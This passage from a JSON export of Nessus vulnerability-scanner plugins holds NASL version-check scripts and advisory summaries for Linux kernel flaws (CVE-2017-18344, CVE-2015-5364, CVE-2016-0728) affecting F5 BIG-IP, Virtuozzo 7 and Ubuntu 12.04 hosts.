"cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL07020416.NASL", "href": "https://www.tenable.com/plugins/nessus/151461", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K07020416.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(151461);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/10/28\");\n\n script_cve_id(\"CVE-2017-18344\");\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (K07020416)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The timer_create 
syscall implementation in kernel/time/posix-timers.c\nin the Linux kernel before 4.14.8 doesn't properly validate the\nsigevent->sigev_notify field, which leads to out-of-bounds access in\nthe show_timer function (called when /proc/$PID/timers is read). This\nallows userspace applications to read arbitrary kernel memory (on a\nkernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).\n(CVE-2017-18344)\n\nImpact\n\nA local attacker may use this vulnerability to expose sensitive\ninformation or cause a denial of service (DoS), makingthe system\nunresponsive.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K07020416\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K07020416.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K07020416\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = 
make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_note(port:0, extra:bigip_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:32", "description": "According to the version of the vzkernel package and the readykernel-patch installed, the Virtuozzo installation on the remote host is affected by the following vulnerability :\n\n - The implementation of timer_create system call in the Linux kernel before 4.14.8 doesn't properly validate the sigevent::sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). 
This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-08-07T00:00:00", "type": "nessus", "title": "Virtuozzo 7 : readykernel-patch (VZA-2018-050)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2021-03-08T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:readykernel", "cpe:/o:virtuozzo:virtuozzo:7"], "id": "VIRTUOZZO_VZA-2018-050.NASL", "href": "https://www.tenable.com/plugins/nessus/111582", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111582);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/08\");\n\n script_cve_id(\n \"CVE-2017-18344\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2018-050)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerability :\n\n - The implementation of timer_create system call in the\n Linux kernel before 4.14.8 doesn't properly validate\n the sigevent::sigev_notify field, which leads to\n out-of-bounds access in the show_timer function (called\n when /proc/$PID/timers is read). 
This allows userspace\n applications to read arbitrary kernel memory (on a\n kernel built with CONFIG_POSIX_TIMERS and\n CONFIG_CHECKPOINT_RESTORE).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2950677\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.openwall.com/lists/oss-security/2018/08/02/3\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.10-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?903233bb\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.15-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f3743365\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-33.22-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d05a0bee\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?07422f3e\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-40.4-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03069afa\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-43.10-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?547b160b\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-46.7-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59613f5f\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-48.2-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", 
value:\"http://www.nessus.org/u?07caf03d\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.10\",\n \"patch\",\"readykernel-patch-30.10-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.15\",\n \"patch\",\"readykernel-patch-30.15-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.26.1.vz7.33.22\",\n \"patch\",\"readykernel-patch-33.22-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.1.1.vz7.37.30\",\n \"patch\",\"readykernel-patch-37.30-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.11.6.vz7.40.4\",\n \"patch\",\"readykernel-patch-40.4-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.17.1.vz7.43.10\",\n \"patch\",\"readykernel-patch-43.10-56.0-1.vl7\"\n 
),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.21.1.vz7.46.7\",\n \"patch\",\"readykernel-patch-46.7-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.21.1.vz7.48.2\",\n \"patch\",\"readykernel-patch-48.2-56.0-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_NOTE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:17:42", "description": "The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 do not properly consider yielding a processor, which allows remote attackers to cause a denial of service (system hang) via incorrect checksums within a UDP packet flood.\n(CVE-2015-5364)", "cvss3": {}, "published": "2017-02-22T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (K17307)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5364"], "modified": "2021-03-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL17307.NASL", "href": "https://www.tenable.com/plugins/nessus/97307", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K17307.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97307);\n script_version(\"3.6\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/10\");\n\n script_cve_id(\"CVE-2015-5364\");\n script_bugtraq_id(75510);\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (K17307)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux\nkernel before 4.0.6 do not properly consider yielding a processor,\nwhich allows remote attackers to cause a denial of service (system\nhang) via incorrect checksums within a UDP packet flood.\n(CVE-2015-5364)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K17307\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K17307.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K17307\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.3.0-11.5.4\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.4.0-11.5.4\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.0.0-11.5.4\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = 
make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.3.0-11.5.4\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:30", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-2870-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2870-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88011", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2870-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88011);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2870-2\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-2870-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. 
A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2870-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", 